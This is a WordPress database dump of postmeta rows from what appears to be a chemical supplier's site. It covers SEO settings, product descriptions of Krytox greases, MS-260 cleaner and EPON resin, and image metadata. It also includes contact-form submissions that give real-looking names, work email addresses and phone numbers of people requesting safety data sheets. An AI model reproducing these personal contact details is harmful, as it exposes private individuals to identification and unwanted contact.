INSERT INTO `wp_postmeta` VALUES (24227, 2741, '_yoast_wpseo_focuskw', 'Krytox 226 FG'); 
INSERT INTO `wp_postmeta` VALUES (24228, 2741, '_yoast_wpseo_title', 'Krytox 226 FG Corrugator Grease - NSF H-1 Rated - Nonflammable'); 
INSERT INTO `wp_postmeta` VALUES (24229, 2741, '_yoast_wpseo_metadesc', 'Krytox 226 FG corrugator greases provide the utmost performance around machinery. Certified for NSF H-1 Rated, for incidental food contact.'); 
INSERT INTO `wp_postmeta` VALUES (24230, 2741, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24231, 2741, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24232, 2741, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (24233, 2743, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24234, 2743, '_seq_num', '76'); 
INSERT INTO `wp_postmeta` VALUES (24235, 2743, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24236, 2743, '_field_12', 'john'); 
INSERT INTO `wp_postmeta` VALUES (24237, 2743, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (24238, 2743, '_field_18', '116'); 
INSERT INTO `wp_postmeta` VALUES (24239, 2743, '_field_14', 'john.hochgurtel@disney.com'); 
INSERT INTO `wp_postmeta` VALUES (24240, 2743, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24241, 2743, '_field_16', 'Need SDS for MS-580N DPMS-N0627A-1 Precision Cleaning Solvent '); 
INSERT INTO `wp_postmeta` VALUES (24242, 2743, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24243, 2743, '_sub_id', '2743'); 
INSERT INTO `wp_postmeta` VALUES (24244, 2744, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24245, 2744, '_seq_num', '77'); 
INSERT INTO `wp_postmeta` VALUES (24246, 2744, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24247, 2744, '_field_12', 'Jin Lee'); 
INSERT INTO `wp_postmeta` VALUES (24248, 2744, '_field_13', 'CBOL Corporation'); 
INSERT INTO `wp_postmeta` VALUES (24249, 2744, '_field_18', '0543286'); 
INSERT INTO `wp_postmeta` VALUES (24250, 2744, '_field_14', 'jin.lee@cbol.com'); 
INSERT INTO `wp_postmeta` VALUES (24251, 2744, '_field_15', '(818) 721-5507'); 
INSERT INTO `wp_postmeta` VALUES (24252, 2744, '_field_16', 'Please give us the access for SDS database.'); 
INSERT INTO `wp_postmeta` VALUES (24253, 2744, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24254, 2744, '_sub_id', '2744'); 
INSERT INTO `wp_postmeta` VALUES (24255, 2745, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24256, 2745, '_seq_num', '78'); 
INSERT INTO `wp_postmeta` VALUES (24257, 2745, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24258, 2745, '_field_12', 'Barbara Straub'); 
INSERT INTO `wp_postmeta` VALUES (24259, 2745, '_field_13', 'U.S. Army'); 
INSERT INTO `wp_postmeta` VALUES (24260, 2745, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24261, 2745, '_field_14', 'barbara.a.straub.mil@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (24262, 2745, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24263, 2745, '_field_16', 'I am trying to obtain an updated SDS for MS-122DF  Military NSN: 9150-01-443-9003.'); 
INSERT INTO `wp_postmeta` VALUES (24264, 2745, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24265, 2745, '_sub_id', '2745'); 
INSERT INTO `wp_postmeta` VALUES (24266, 2746, '_edit_lock', '1487963729:2'); 
INSERT INTO `wp_postmeta` VALUES (24267, 2746, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24268, 2746, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24269, 2746, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24270, 2746, '_thumbnail_id', '2747'); 
INSERT INTO `wp_postmeta` VALUES (24271, 2746, '312_default_editor', '<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Property</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Corrugator Krytox 226 FG</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Corrugator Krytox 227 FG</strong></td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>ISO Grade of Base Oil</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.95</td>\r\n<td style="text-align: center;">1.95</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %, 30 hr at 99 °C (210 °F)</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">3</td>\r\n</tr>\r\n<tr>\r\n<td>Anticorrosion Additive</td>\r\n<td style="text-align: center;">Sodium Nitrite</td>\r\n<td style="text-align: center;">Sodium Nitrite</td>\r\n</tr>\r\n<tr>\r\n<td>Coefficient of Friction, ASTM D2266</td>\r\n<td style="text-align: center;">0.11</td>\r\n<td style="text-align: center;">0.11</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, creamy consistency</td>\r\n<td style="text-align: center;">White, creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Base Oil Viscosity, cSt\r\nat 40 °C (104 °F)\r\nat 100 °C (212 °F)</td>\r\n<td style="text-align: center;" width="206">240\r\n25</td>\r\n<td style="text-align: center;" width="206">440\r\n42</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">–36–260\r\n(–33–500)</td>\r\n<td style="text-align: center;" width="206">–30–288\r\n(–22–550)</td>\r\n</tr>\r\n<tr>\r\n<td>Rust Prevention, ASTM D1743</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Four Ball Wear Scar, ASTM D2266\r\nat 1 hr, 1200 rpm, 107 °C (225 °F), 20 kg</td>\r\n<td style="text-align: center;" width="206">0.4 mm</td>\r\n<td style="text-align: center;">0.4 mm</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Oil Volatility, %, 22 hr at 204 °C (400 °F)\r\nASTM D2595</td>\r\n<td style="text-align: center;">3 max.</td>\r\n<td style="text-align: center;">1 max.</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24272, 2746, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24273, 2746, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24274, 2746, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (24275, 2746, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24276, 2746, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24277, 2746, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24278, 2746, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24279, 2746, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24280, 2746, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24281, 2746, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24282, 2746, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24283, 2746, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24284, 2746, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24285, 2746, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24286, 2746, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24287, 2746, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24288, 2746, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24289, 2746, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24290, 2746, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24291, 2746, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24292, 2746, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24293, 2746, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24294, 2746, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24295, 2746, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24296, 2746, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24297, 2746, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24298, 2746, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24299, 2746, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24300, 2746, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24301, 2746, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24302, 2746, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24303, 2746, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24304, 2746, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24305, 2746, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24306, 2746, '_ywtm_content_tab_description', '<h1><strong>Krytox 226 FG —Setting the Standard for the Corrugating Industry</strong></h1>\r\nSince the 1980s, Krytox 226 FG anticorrosion greases have set the standard for high temperature bearing lubrication in corrugator applications. These products are the same high performance formulation the corrugated industry has trusted for years and, we are pleased to announce, are now certified for <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">incidental food contact.</a>\r\n<h4><strong>NSF Certification Means Safety and Confidence</strong></h4>\r\nTo provide absolute confidence and safety in food-related operations, these products are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1 food grade certified.</a> Corrugator Krytox 226 FG and Corrugator Krytox 227 FG provide you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert. Krytox™ corrugator greases are recommended for use in high temperature corrugated equipment applications and manufacture of food packaging materials where an H-1 rated lubricant is required.\r\n<h4><strong>Reliability and Performance for Your Most Demanding Needs</strong></h4>\r\nHigh temperature, extreme pressure Krytox greases excel in the most demanding environments. Their nonoxidizing chemistry and wide temperature range allows them to be used in temperature extremes. Its superior oil film strength reduces friction and abrasive wear to significantly extend equipment life in severe duty applications. Krytox provides excellent water washout resistance, and superior rust and corrosion protection for bearings and components. Krytox is silicone-free, contains no VOC materials or chlorine, and is not hazardous to the atmosphere or ozone layer.\r\n<h4><strong>Chemical and Environmental Compatibility</strong></h4>\r\nWhile Krytox fluorinated greases are non-reactive, its PFPE chemistry is very different from standard hydrocarbon or synthetic chemistries and should never be mixed with non-fluorinated greases.\r\n\r\nKrytox lubricants are inert and will not react with any materials they may come in contact with. The polymeric nature of these products is extremely resistant to moisture, so it stays in place during cleaning. Cleaners and disinfectants, both acidic and caustic types, do not affect them. Steam and high temperatures will not damage them. They do not damage plastic or elastomer seals, or cause corrosion to metals. They are nonflammable and are safe for use in oxygen service.\r\n<h4><strong>Packing the Bearing</strong></h4>\r\nNew bearings should be inspected for damage and cleanliness before use. New unlubricated bearings are often coated with hydrocarbon-based rust preventive oils to protect them during storage. These preservative\r\noils must be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. The preservatives coat the bearing surface to prevent rust and corrosion; but, if not removed prior to use, will prevent the grease from protecting the metal surface. If left on the bearing, the preservative coating can oxidize and harden, and can create debris that will contaminate the grease.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-corrugator-greases/">To learn more about corrugator greases please click here.</a>'); 
INSERT INTO `wp_postmeta` VALUES (24307, 2746, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24308, 2746, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24309, 2746, '_yoast_wpseo_primary_product_cat', '143'); 
INSERT INTO `wp_postmeta` VALUES (24310, 2746, '_yoast_wpseo_focuskw_text_input', 'Krytox 227 FG'); 
INSERT INTO `wp_postmeta` VALUES (24311, 2746, '_yoast_wpseo_focuskw', 'Krytox 227 FG'); 
INSERT INTO `wp_postmeta` VALUES (24312, 2746, '_yoast_wpseo_title', 'Krytox 227 FG Corrugator Grease - NSF H-1 Rated - Nonflammable'); 
INSERT INTO `wp_postmeta` VALUES (24313, 2746, '_yoast_wpseo_metadesc', 'Krytox 227 FG corrugator greases provide the utmost performance around machinery. Certified for NSF H-1 Rated, for incidental food contact.'); 
INSERT INTO `wp_postmeta` VALUES (24314, 2746, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24315, 2746, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24316, 2746, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (24329, 2747, '_wp_attached_file', '2016/10/shutterstock_373451461.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24330, 2747, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/10/shutterstock_373451461.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451461-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_373451461-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_373451461-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_373451461-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451461-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373451461-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_373451461-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_373451461-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24331, 2746, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24332, 2746, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24337, 2751, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24338, 2751, '_seq_num', '79'); 
INSERT INTO `wp_postmeta` VALUES (24339, 2751, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24340, 2751, '_field_12', 'Maryrose Barrios'); 
INSERT INTO `wp_postmeta` VALUES (24341, 2751, '_field_13', 'Georgia Institute of Technology'); 
INSERT INTO `wp_postmeta` VALUES (24342, 2751, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24343, 2751, '_field_14', 'mbarrios@gatech.edu'); 
INSERT INTO `wp_postmeta` VALUES (24344, 2751, '_field_15', '(404) 894-5201'); 
INSERT INTO `wp_postmeta` VALUES (24345, 2751, '_field_16', 'We recently purchased some MS-111 stripper to test its removal of some UHV epoxy (EPOTEK 353ND) from a glass chamber. For the test we used microscope glass slides epoxied together with a lap joint ~1/4&#039;&#039; wide. After soaking these slides in the solvent overnight, we found that by the next day the solvent had indeed removed the epoxy, but had also fractured and broken the edges of the glass slides along where the glue joint was made.\r\n\r\nDo you know of any reason why this would happen in this manner repeatedly or could you give me any extra information about the properties of the MS-111 stripper (aside from the SDS)? Is there any recommended method to avoid this type of breaking?\r\n\r\nThanks.'); 
INSERT INTO `wp_postmeta` VALUES (24346, 2751, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24347, 2751, '_sub_id', '2751'); 
INSERT INTO `wp_postmeta` VALUES (24348, 2752, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24349, 2752, '_seq_num', '80'); 
INSERT INTO `wp_postmeta` VALUES (24350, 2752, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24351, 2752, '_field_12', 'James Cross'); 
INSERT INTO `wp_postmeta` VALUES (24352, 2752, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (24353, 2752, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24354, 2752, '_field_14', 'james.d.cross@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (24355, 2752, '_field_15', '(207) 438-5876'); 
INSERT INTO `wp_postmeta` VALUES (24356, 2752, '_field_16', 'I am looking for the MSDS sheet for Epoxy 907.'); 
INSERT INTO `wp_postmeta` VALUES (24357, 2752, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24358, 2752, '_sub_id', '2752'); 
INSERT INTO `wp_postmeta` VALUES (24359, 2753, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24360, 2753, '_seq_num', '81'); 
INSERT INTO `wp_postmeta` VALUES (24361, 2753, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24362, 2753, '_field_12', 'Kim Nguyen '); 
INSERT INTO `wp_postmeta` VALUES (24363, 2753, '_field_13', 'Disneyland Resort '); 
INSERT INTO `wp_postmeta` VALUES (24364, 2753, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24365, 2753, '_field_14', 'kim.p.nguyen@disney.com'); 
INSERT INTO `wp_postmeta` VALUES (24366, 2753, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24367, 2753, '_field_16', 'Hello -\r\nI&#039;d like to request the volatile organic compound (VOC) content for MS-580N (P/N DPMS-N067A-1). \r\nThank you, \r\nKim Nguyen'); 
INSERT INTO `wp_postmeta` VALUES (24368, 2753, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24369, 2753, '_sub_id', '2753'); 
INSERT INTO `wp_postmeta` VALUES (24371, 1339, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (24372, 1338, '_yoast_wpseo_focuskw_text_input', 'MS-260'); 
INSERT INTO `wp_postmeta` VALUES (24373, 1338, '_yoast_wpseo_focuskw', 'Plastic, Glass & Metal Cleaner'); 
INSERT INTO `wp_postmeta` VALUES (24374, 1338, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24375, 1338, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24376, 1338, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (24377, 1338, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24378, 1338, '_ywtm_content_tab_description', 'A high quality Plastic,Glass &amp; Metal Cleaner MS-260 is especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol). Properitary cleaning technology allows for quick cleaning and fast drying for a variety of operations.  Foaming actions helps to loosen contaminates and high cleaning solvents gently dissolves solids. Contains Professional strength cleaning agents\r\n\r\nMiller-Stephenson MS-260 Plastic, Glass &amp; Metal Cleaner is for industrial use only and is not recommend for consumer applications\r\n\r\n<strong>Features &amp; Benefits: </strong>\r\n<ul id="description-list">\r\n 	<li class="description-list-item">16oz aerosol</li>\r\n 	<li class="description-list-item">Excellent for use on dials, gauges and oscilloscopes</li>\r\n 	<li class="description-list-item">Recommended for aircraft windshields</li>\r\n 	<li class="description-list-item">Contains no ammonia</li>\r\n 	<li class="description-list-item">Non-flammable</li>\r\n 	<li class="description-list-item">No ODC (ozone depleting chemicals)</li>\r\n</ul>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (24379, 1338, '_yoast_wpseo_linkdex', '65'); 
INSERT INTO `wp_postmeta` VALUES (24380, 910, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24381, 910, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24382, 910, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (24383, 910, '_yoast_wpseo_focuskw_text_input', 'EPON 815C'); 
INSERT INTO `wp_postmeta` VALUES (24384, 910, '_yoast_wpseo_focuskw', 'EPON 815C'); 
INSERT INTO `wp_postmeta` VALUES (24385, 910, '_yoast_wpseo_metadesc', 'EPON 815C is a low viscosity liquid bisphenol A based epoxy resin containing a commercial grade of n-butyl glycidyl ether.'); 
INSERT INTO `wp_postmeta` VALUES (24386, 910, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24387, 910, '_yoast_wpseo_focuskeywords', '[{"keyword":"Epoxy Resin Blend","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (24388, 1889, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (24389, 910, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24390, 910, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24391, 910, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (24392, 910, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24393, 910, '_ywtm_content_tab_description', '<p class="Section1">EPON Resin 815C is a low viscosity liquid bisphenol <span class="GramE">A</span> based epoxy resin containing a commercial grade of n-butyl glycidyl ether. EPON Resin 815C is functionally equivalent to EPON Resin 815, and is suitable as a replacement for EPON Resin 815 in most applications.</p>\r\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Adhesives</li>\r\n 	<li>Electrical casting and encapsulation</li>\r\n 	<li>Contact and vacuum bag laminating</li>\r\n 	<li>Solventless coatings</li>\r\n 	<li>Floor topping and grouting compositions</li>\r\n 	<li>Tooling</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low viscosity, allows for easy pumping and wetting of pigments and fillers</li>\r\n 	<li>100% reactive. Reacts with a full range of curing agents</li>\r\n 	<li>Provides minimal reduction of performance properties</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (24394, 910, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (24395, 2757, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24396, 2757, '_seq_num', '82'); 
INSERT INTO `wp_postmeta` VALUES (24397, 2757, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24398, 2757, '_field_12', 'Gary Hand'); 
INSERT INTO `wp_postmeta` VALUES (24399, 2757, '_field_13', 'ConAgra Foods'); 
INSERT INTO `wp_postmeta` VALUES (24400, 2757, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24401, 2757, '_field_14', 'gary.hand@conagrafoods.com'); 
INSERT INTO `wp_postmeta` VALUES (24402, 2757, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24403, 2757, '_field_16', 'Currently using MS-122RA and I can not find it on the website. Is the product still available or has it changed.'); 
INSERT INTO `wp_postmeta` VALUES (24404, 2757, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24405, 2757, '_sub_id', '2757'); 
INSERT INTO `wp_postmeta` VALUES (24407, 2694, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (24411, 2761, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24412, 2761, '_seq_num', '83'); 
INSERT INTO `wp_postmeta` VALUES (24413, 2761, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24414, 2761, '_field_12', 'Bernard'); 
INSERT INTO `wp_postmeta` VALUES (24415, 2761, '_field_13', 'Boeing Company'); 
INSERT INTO `wp_postmeta` VALUES (24416, 2761, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24417, 2761, '_field_14', 'bernard.roberts@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (24418, 2761, '_field_15', '(206) 612-1706'); 
INSERT INTO `wp_postmeta` VALUES (24419, 2761, '_field_16', 'Need access to  SDS.'); 
INSERT INTO `wp_postmeta` VALUES (24420, 2761, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24421, 2761, '_sub_id', '2761'); 
INSERT INTO `wp_postmeta` VALUES (24422, 423, '_yoast_wpseo_focuskw_text_input', 'Water-based Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24423, 2762, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24424, 2762, '_seq_num', '84'); 
INSERT INTO `wp_postmeta` VALUES (24425, 2762, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24426, 2762, '_field_12', 'SHERRIE KIRBY'); 
INSERT INTO `wp_postmeta` VALUES (24427, 2762, '_field_13', 'MILLER STEPHENSON'); 
INSERT INTO `wp_postmeta` VALUES (24428, 2762, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24429, 2762, '_field_14', 'ILCS@MSCHEM.COM'); 
INSERT INTO `wp_postmeta` VALUES (24430, 2762, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24431, 2762, '_field_16', 'NEED ACCESS TO SDS SHEETS'); 
INSERT INTO `wp_postmeta` VALUES (24432, 2762, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24433, 2762, '_sub_id', '2762'); 
INSERT INTO `wp_postmeta` VALUES (24434, 2763, '_edit_lock', '1495803670:3'); 
INSERT INTO `wp_postmeta` VALUES (24435, 2763, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24436, 2764, '_wp_attached_file', '2016/10/adl-comparison.png'); 
INSERT INTO `wp_postmeta` VALUES (24437, 2764, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:556;s:6:"height";i:265;s:4:"file";s:26:"2016/10/adl-comparison.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"adl-comparison-340x265.png";s:5:"width";i:340;s:6:"height";i:265;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"adl-comparison-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"adl-comparison-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"adl-comparison-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}s:11:"shop_single";a:4:{s:4:"file";s:26:"adl-comparison-510x265.png";s:5:"width";i:510;s:6:"height";i:265;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24440, 2763, '_visibility', 'visible'); 
